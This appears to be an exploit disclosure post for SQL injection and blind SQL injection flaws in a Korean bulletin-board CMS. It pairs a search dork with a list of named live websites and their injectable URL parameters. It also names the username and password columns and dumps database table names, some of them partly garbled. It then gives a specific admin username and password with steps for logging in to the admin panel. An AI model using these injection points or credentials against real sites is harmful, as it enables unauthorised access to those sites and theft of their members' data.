88 88 88 88 ,d8 8b,dPPYba, 88 ,a8" 88P' "Y8 8888[ 88 888 88`"Yba, 88 888 88 `Y8a 88 88 ,d 88 88 88 MM88MMM 8b,dPPYba, ,adPPYYba, ,adPPYba, 88,dPPYba, 88 88P' "Y8 "" `Y8 I8[ "" 88P' "8a 88 88 ,adPPPPP88 `"Y8ba, 88 88 88, 88 88, ,88 aa ]8I 88 88 "Y888 88 `"8bbdP"Y8 `"YbbdP"' 88 88 #Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*) #Web Site Creator => ??? #Dork => inurl:/board.php?tbl=notice&mode=VIEW&num= #CMS => .kr Board #Vulnz => Blind SQLi/SQLi #Date => 20/03/2023 *PoC* [code] ---------------------------------------------------------------------------------------------- http://acrnmembers.org/bbs/board.php?tbl=product_thumb&mode=VIEW&category=&chr=&num=*[SQLi]* | #1 ---------------------------------------------------------------------------------------------- http://acrnmembers.org/bbs/board.php?tbl=notice&mode=VIEW&num=*[SQLi]* | #2 _______________________________________________________________________ *IMPORTANT COLUMNS FOR:* | USER => mem_id | PSW => med_pass | __________________________ _______________________________________________________________________ http://atsolid.com/bbs/board.php?tbl=notice&mode=VIEW&num=*[SQLi]* | #3 ------------------------------------------------------------------------------------ *ALL TABLES:* | ____________________________________________________________________________________ v_plugin upso2_si_gu upso2_si upso2_config upso2_analytics syndi_delete_content_log sample_contents sample_bbs_info happy_config V_SmsMsg V_SiteConfig V_SearchWord V_Product_File V_Product V_Popup V_Pay_Temp V_Order_Info_Temp V_Order_Info V_Order V_Online V_Mms_File V_Member_Semo V_Member_Point V_Member_Memo V_Member_Level V_Member V_MailSkin V_MailMsg V_MailHistory V_Login_Info V_Faq V_Counter V_Counsel_cate V_Counsel V_Category V_Cart V_Board_Item_test V_Board_Item_notice V_Board_File V_Board_Config V_Board_Comm_test V_Board_Comm_notice V_Banner ------------------------------------------------------------------------------------ 1- Now Try Login to */member/login.php* With USER: *master* and PASSWORD: *5975* | 2- Go to Page /admin/ of site (now you are logged) | ____________________________________________________________________________________ ________________________________________________________________________________ http://www.kihyungdo.co.kr/bbs/board.php?tbl=bbs61&mode=VIEW&num=*[Blind SQLi]* | ________________________________________________________________________________| #4 ________________________________________________________________________________ http://www.kotica.or.kr/bbs/board.php?tbl=*[Blind SQLi]* | #5 ________________________________________________________________________________| #DB Name => *kotica* | --------------------- [tables] Gn_?oard_Comm_?eport Gn_Board_Comm_regu?ation Gn_?oard_Com?_qan?a2 Gn_Board_?omm_qanda Gn_B?ard_Comm_promote Gn_Board_Comm_objection Gn_?oard_C?mm_no?ice2 Gn_Board_Comm_not?ce Gn_Board_Comm_legal Gn_Board_Comm_infra Gn_Bo?rd_Comm_fandq2 Gn_Board_Comm_fandq Gn_Board_Comm_education Gn?Board_C?mm_commission Gn_Board_Comm_??rt Gn_Board_Comm_c?ll Gn_Board_Comm_business Gn_Ban?er [/tables] _________________________________________________________________________________| Logins.. __________________ /member/login.php | /admin/ | ------------------ [/code] ._________. */ ///______I ) . /_(_) /__/*PoC End*